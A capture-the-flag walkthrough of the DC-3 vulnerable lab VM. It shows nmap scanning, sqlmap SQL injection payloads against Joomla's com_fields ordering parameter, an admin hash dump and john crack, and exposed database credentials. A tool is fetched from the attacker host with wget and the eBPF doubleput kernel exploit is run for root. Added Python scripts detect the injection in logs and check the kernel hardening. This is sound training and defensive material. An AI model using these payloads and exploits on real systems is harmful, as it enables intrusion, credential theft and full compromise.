DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
For those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).
If that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.
From DC-3 onward there are no more hints; there is only a single final flag.
0x01. The usual routine: start with nmap
We can see that .1 is the gateway, .2 is the host machine and .6 is Kali, so .5 must be our victim.
root@JIYE:~/tmp/DC3# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-21 20:53 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0021s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00033s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.5
Host is up (0.00026s latency).
MAC Address: 00:0C:29:63:7B:83 (VMware)
Nmap scan report for 192.168.1.6
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.09 seconds
root@JIYE:~/tmp/DC3#
Addendum: netdiscover works just as well
root@JIYE:~/tmp/DC3# netdiscover
 Currently scanning: 192.168.21.0/16   |   Screen View: Unique Hosts

 8 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 480
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.2     50:5b:c2:8c:be:a5      6     360  Liteon Technology Corporation
 192.168.1.1     68:d1:ba:1f:fd:48      1      60  Shenzhen YOUHUA Technology Co., Ltd
 192.168.1.5     00:0c:29:63:7b:83      1      60  VMware, Inc.
root@JIYE:~/tmp/DC3# nmap -A 192.168.1.5 -p 1-65535 -oN nmap.A
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-21 21:02 EDT
Nmap scan report for 192.168.1.5
Host is up (0.00051s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 00:0C:29:63:7B:83 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 192.168.1.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds
root@JIYE:~/tmp/DC3#
...
[21:42:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[21:42:32] [INFO] fetching database names
[21:42:32] [INFO] retrieved: 'information_schema'
[21:42:32] [INFO] retrieved: 'joomladb'
[21:42:32] [INFO] retrieved: 'mysql'
[21:42:32] [INFO] retrieved: 'performance_schema'
[21:42:32] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

[21:42:32] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2670 times
[21:42:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.5'
root@JIYE:~/tmp/DC3# sqlmap -u "http://192.168.1.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.8#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:51:56 /2020-08-21/

[21:51:56] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[21:51:56] [INFO] resuming back-end DBMS 'mysql'
[21:51:56] [INFO] testing connection to the target URL
[21:51:56] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=k3m9bafm9dg...dg5cjc6tq0'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(8495,CONCAT(0x2e,0x7170786b71,(SELECT (ELT(8495=8495,1))),0x7170786b71),8473))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8890 FROM (SELECT(SLEEP(5)))cGDb)
---
[21:51:59] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[21:51:59] [INFO] fetching current database
[21:51:59] [INFO] retrieved: 'joomladb'
current database: 'joomladb'
[21:51:59] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[21:51:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.5'

[*] ending @ 21:51:59 /2020-08-21/

root@JIYE:~/tmp/DC3#
[21:54:04] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 93 times
[21:54:04] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.5'
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:59:25 /2020-08-21/

[21:59:25] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[21:59:25] [INFO] resuming back-end DBMS 'mysql'
[21:59:25] [INFO] testing connection to the target URL
[21:59:26] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=ug2jkbpm6cl...hvfgeqmmq0'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(8495,CONCAT(0x2e,0x7170786b71,(SELECT (ELT(8495=8495,1))),0x7170786b71),8473))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8890 FROM (SELECT(SLEEP(5)))cGDb)
---
[21:59:31] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[21:59:31] [INFO] fetching columns for table '#__users' in database 'joomladb'
[21:59:32] [WARNING] unable to retrieve column names for table '#__users' in database 'joomladb'
do you want to use common column existence check? [y/N/q] y
[21:59:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
which common columns (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/data/txt/common-columns.txt' (press Enter)
[2] custom
> 1
[22:00:00] [INFO] checking column existence using items from '/usr/share/sqlmap/data/txt/common-columns.txt'
[22:00:00] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 10
[22:00:07] [INFO] starting 10 threads
[22:00:07] [INFO] retrieved: id
[22:00:07] [INFO] retrieved: name
[22:00:07] [INFO] retrieved: username
[22:00:08] [INFO] retrieved: email
[22:00:11] [INFO] retrieved: password
[22:00:51] [INFO] retrieved: params
Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | non-numeric |
| id       | numeric     |
| name     | non-numeric |
| params   | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+

[22:01:02] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2649 times
[22:01:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.5'
root@JIYE:~/tmp/DC3# sqlmap -u "http://192.168.1.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "name,password" --dump -p list[fullordering]
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.8#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:06:02 /2020-08-21/

[22:06:02] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE) AppleWebKit/523.13 (KHTML, like Gecko) Version/3.0 Safari/523.13' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[22:06:02] [INFO] resuming back-end DBMS 'mysql'
[22:06:02] [INFO] testing connection to the target URL
[22:06:02] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=8hrfk2ep2le...ioqrv6v505'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(8495,CONCAT(0x2e,0x7170786b71,(SELECT (ELT(8495=8495,1))),0x7170786b71),8473))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8890 FROM (SELECT(SLEEP(5)))cGDb)
---
[22:06:04] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[22:06:04] [INFO] fetching entries of column(s) 'name, password' for table '#__users' in database 'joomladb'
[22:06:04] [INFO] retrieved: 'admin'
[22:06:04] [INFO] retrieved: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'
Database: joomladb
Table: #__users
[1 entry]
+-------+--------------------------------------------------------------+
| name  | password                                                     |
+-------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+-------+--------------------------------------------------------------+

[22:06:04] [INFO] table 'joomladb.`#__users`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.1.5/dump/joomladb/#__users.csv'
[22:06:04] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 6 times
[22:06:04] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.5'

[*] ending @ 22:06:04 /2020-08-21/

root@JIYE:~/tmp/DC3#
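Seen from the defender's side, the injection point sqlmap settled on above (the list[fullordering] parameter of option=com_fields, with the site answering 500 to most probes) is easy to hunt for in the web server's access log. The following is an added example, not code from the original writeup: it runs three checks over constructed Apache combined-format log lines, using the two payloads quoted in the sqlmap output above as the malicious samples.

```python
"""Flag SQL-injection probes against Joomla's com_fields ordering parameter.
Added example for this writeup (not the post's code); Apache combined-format
access log lines are assumed and the SAMPLE_LOG entries are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log format; only the client, request path and status are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" (?P<status>\d{3}) ')
# Legitimate Joomla ordering values look like "a.ordering ASC" or "a.id DESC".
ORDERING_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_.]*(\s+(ASC|DESC))?", re.IGNORECASE)
# Function calls seen in the payloads on this page plus common SQLi primitives.
SQL_FUNC_RE = re.compile(
    r"\b(UPDATEXML|EXTRACTVALUE|SLEEP|BENCHMARK|CONCAT|ELT|SELECT|UNION)\s*\(", re.IGNORECASE)

def ordering_values(path):
    """Decoded list[fullordering] values of a com_fields request, None otherwise."""
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    if params.get("option", [""])[0] != "com_fields":
        return None
    return params.get("list[fullordering]", [])

def classify(path, status):
    """Return the reasons a request is suspicious; an empty list means benign."""
    values = ordering_values(path)
    if values is None:  # not a com_fields request at all
        return []
    reasons = []
    for value in values:
        if not ORDERING_RE.fullmatch(value):
            reasons.append("ordering value is not a column reference")
        if SQL_FUNC_RE.search(value):
            reasons.append("SQL function call in ordering value")
    if status >= 500:  # sqlmap's probing produced thousands of these on DC-3
        reasons.append("server error on com_fields request")
    return reasons

def scan(lines):
    """Return (client, status, ordering values, reasons) for each flagged line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format
        status = int(m.group("status"))
        reasons = classify(m.group("path"), status)
        if reasons:
            hits.append((m.group("ip"), status, ordering_values(m.group("path")), reasons))
    return hits

# Constructed sample: two sqlmap-style probes (payloads quoted from the writeup
# above) and one legitimate ordering request from another client.
SAMPLE_LOG = [
    '192.168.1.6 - - [21/Aug/2020:21:51:56 -0400] "GET /index.php?option=com_fields'
    '&list%5Bfullordering%5D=%28UPDATEXML%288495%2CCONCAT%280x2e%2C0x7170786b71%2C'
    '%28SELECT+%28ELT%288495%3D8495%2C1%29%29%29%2C0x7170786b71%29%2C8473%29%29'
    ' HTTP/1.1" 500 1183',
    '192.168.1.6 - - [21/Aug/2020:21:51:57 -0400] "GET /index.php?option=com_fields'
    '&list%5Bfullordering%5D=%28SELECT+8890+FROM+%28SELECT%28SLEEP%285%29%29%29cGDb%29'
    ' HTTP/1.1" 200 6244',
    '192.168.1.2 - - [21/Aug/2020:21:52:10 -0400] "GET /index.php?option=com_fields'
    '&list%5Bfullordering%5D=a.ordering+ASC HTTP/1.1" 200 6244',
]

if __name__ == "__main__":
    for ip, status, values, reasons in scan(SAMPLE_LOG):
        print(f"{ip} {status} {values}: {'; '.join(reasons)}")
```

Run against a real log with `scan(open("/var/log/apache2/access.log"))`; the status check alone also catches the bare `list[fullordering]=updatexml` probe the sqlmap command line uses, since it passes the column allowlist but makes the page 500.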
0x11. Cracking the hash with john
Password: snoopy
root@JIYE:~/tmp/DC3# john joomla_v3.7.0_
joomla_v3.7.0_admin_hash.txt  joomla_v3.7.0_sqli.txt
root@JIYE:~/tmp/DC3# john joomla_v3.7.0_admin_hash.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
snoopy           (?)
1g 0:00:00:00 DONE 2/3 (2020-08-21 22:10) 3.448g/s 124.1p/s 124.1c/s 124.1C/s 123456..buster
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@JIYE:~/tmp/DC3#
www-data@DC-3:/var/www/html$ cat configuration.php
<?php
class JConfig {
	public $offline = '0';
	public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
	public $display_offline_message = '1';
	public $offline_image = '';
	public $sitename = 'DC-3';
	public $editor = 'tinymce';
	public $captcha = '0';
	public $list_limit = '20';
	public $access = '1';
	public $debug = '0';
	public $debug_lang = '0';
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'root';
	public $password = 'squires';
	public $db = 'joomladb';
	public $dbprefix = 'd8uea_';
	public $live_site = '';
	public $secret = '7M6S1HqGMvt1JYkY';
	public $gzip = '0';
	public $error_reporting = 'default';
	public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}';
	public $ftp_host = '127.0.0.1';
	public $ftp_port = '21';
	public $ftp_user = '';
	public $ftp_pass = '';
	public $ftp_root = '';
	public $ftp_enable = '0';
	public $offset = 'UTC';
	public $mailonline = '1';
	public $mailer = 'mail';
	public $mailfrom = 'freddy@norealaddress.net';
	public $fromname = 'DC-3';
	public $sendmail = '/usr/sbin/sendmail';
	public $smtpauth = '0';
	public $smtpuser = '';
	public $smtppass = '';
	public $smtphost = 'localhost';
	public $smtpsecure = 'none';
	public $smtpport = '25';
	public $caching = '0';
	public $cache_handler = 'file';
	public $cachetime = '15';
	public $cache_platformprefix = '0';
	public $MetaDesc = 'A website for DC-3';
	public $MetaKeys = '';
	public $MetaTitle = '1';
	public $MetaAuthor = '1';
	public $MetaVersion = '0';
	public $robots = '';
	public $sef = '1';
	public $sef_rewrite = '0';
	public $sef_suffix = '0';
	public $unicodeslugs = '0';
	public $feed_limit = '10';
	public $feed_email = 'none';
	public $log_path = '/var/www/html/administrator/logs';
	public $tmp_path = '/var/www/html/tmp';
	public $lifetime = '15';
	public $session_handler = 'database';
	public $shared_session = '0';
}
www-data@DC-3:/var/www/html$
Clearly no dumb luck this time.
www-data@DC-3:/var/www/html$ sudo -l
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
3. Privilege escalation via the system kernel
Check the system kernel version
www-data@DC-3:/tmp$ uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
www-data@DC-3:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 16.04 LTS
Release:	16.04
Codename:	xenial
www-data@DC-3:/tmp$
Copy linux-exploit-suggester over to DC-3
root@JIYE:~/tmp/DC3# cp linux-exploit-suggester.sh /root
root@JIYE:~/tmp/DC3# cd
root@JIYE:~#
root@JIYE:~#
root@JIYE:~# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.1.5 - - [22/Aug/2020 02:06:47] "GET /linux-exploit-suggester.sh HTTP/1.1" 200 -
www-data@DC-3:/tmp$ wget 192.168.1.6/linux-exploit-suggester.sh
--2020-08-22 16:07:27--  http://192.168.1.6/linux-exploit-suggester.sh
Connecting to 192.168.1.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84889 (83K) [text/x-sh]
Saving to: 'linux-exploit-suggester.sh'

linux-exploit-sugge 100%[===================>]  82.90K  --.-KB/s    in 0s
Kernel version: 4.4.0
Architecture: i686
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
   Exposure: highly probable
   Tags: [ ubuntu=16.04{kernel:4.4.0-21-generic} ]
   Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2017-7308] af_packet

   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: probable
   Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels

[+] [CVE-2017-6074] dccp

   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: probable
   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2017-1000112] NETIF_F_UFO

   Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
   Exposure: probable
   Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL:
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE

   Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
   Exposure: less probable
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
   Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only

[+] [CVE-2016-2384] usb-midi

   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [CVE-2016-0728] keyring

   Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/40003
   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
www-data@DC-3:/tmp$ cd 39772
www-data@DC-3:/tmp/39772$ ls
crasher.tar  exploit.tar
www-data@DC-3:/tmp/39772$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC-3:/tmp/39772$ ls
crasher.tar  ebpf_mapfd_doubleput_exploit  exploit.tar
www-data@DC-3:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh  doubleput.c  hello.c  suidhelper.c
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ chmod +x compile.sh
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
     .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
     .license = (__aligned_u64)""
               ^
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$
Compiling produces the executables; now run the exploit.
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh  doubleput  doubleput.c  hello  hello.c  suidhelper  suidhelper.c
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit#
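The suggester's comment on the 39772.zip entry above states the two preconditions that made this escalation possible: CONFIG_BPF_SYSCALL set and kernel.unprivileged_bpf_disabled != 1, which is why setting that sysctl to 1 is the standard hardening step on kernels of this vintage. Below is an added example, not code from the writeup or from linux-exploit-suggester, that evaluates exactly those two conditions on a host; the paths it reads (/boot/config-<release>, /proc/config.gz, /proc/sys/kernel/unprivileged_bpf_disabled) are the standard Linux locations and SAMPLE_CONFIG is a constructed fragment.

```python
"""Evaluate the eBPF exposure preconditions quoted by linux-exploit-suggester.
Added example for this writeup, not code from the post or the suggester: the
entry pointing at 39772.zip above says "CONFIG_BPF_SYSCALL needs to be set &&
kernel.unprivileged_bpf_disabled != 1". Those two conditions are checked from
a kernel .config text and the sysctl value; SAMPLE_CONFIG is constructed."""
import gzip
import os
import platform
import re


def kconfig_enabled(config_text, option):
    """True when `option` is built in (=y) or a module (=m) in a .config dump."""
    return re.search(rf"^{re.escape(option)}=[ym]$", config_text, re.MULTILINE) is not None


def assess_bpf_exposure(config_text, unprivileged_bpf_disabled):
    """Apply the suggester's two preconditions; returns (exposed, explanation).

    The sysctl is 0 when any user may call bpf() and 1 when it is disabled
    (newer kernels also accept 2, which disables it but still lets root change
    the setting), so any nonzero value counts as mitigated here.
    """
    if not kconfig_enabled(config_text, "CONFIG_BPF_SYSCALL"):
        return False, "bpf() syscall not compiled into this kernel"
    if unprivileged_bpf_disabled is None:
        return False, "sysctl kernel.unprivileged_bpf_disabled not present; cannot assess"
    if unprivileged_bpf_disabled != 0:
        return False, "unprivileged bpf() disabled by sysctl"
    return True, ("unprivileged users can call bpf(); mitigate with "
                  "sysctl -w kernel.unprivileged_bpf_disabled=1")


def read_kernel_config(release=None):
    """Load the running kernel's config from /boot or /proc/config.gz, else None."""
    release = release or platform.release()
    boot_cfg = f"/boot/config-{release}"
    if os.path.exists(boot_cfg):
        with open(boot_cfg) as fh:
            return fh.read()
    if os.path.exists("/proc/config.gz"):
        with gzip.open("/proc/config.gz", "rt") as fh:
            return fh.read()
    return None


def read_unprivileged_bpf_disabled():
    """Read the live sysctl value; None when the knob does not exist."""
    try:
        with open("/proc/sys/kernel/unprivileged_bpf_disabled") as fh:
            return int(fh.read().strip())
    except (FileNotFoundError, ValueError):
        return None


# Constructed fragment resembling the config of an Ubuntu 16.04 4.4.0 kernel.
SAMPLE_CONFIG = "CONFIG_BPF=y\nCONFIG_BPF_SYSCALL=y\n# CONFIG_BPF_JIT is not set\n"

if __name__ == "__main__":
    cfg = read_kernel_config() or SAMPLE_CONFIG  # fall back to the sample offline
    exposed, why = assess_bpf_exposure(cfg, read_unprivileged_bpf_disabled())
    print(("EXPOSED: " if exposed else "mitigated: ") + why)
```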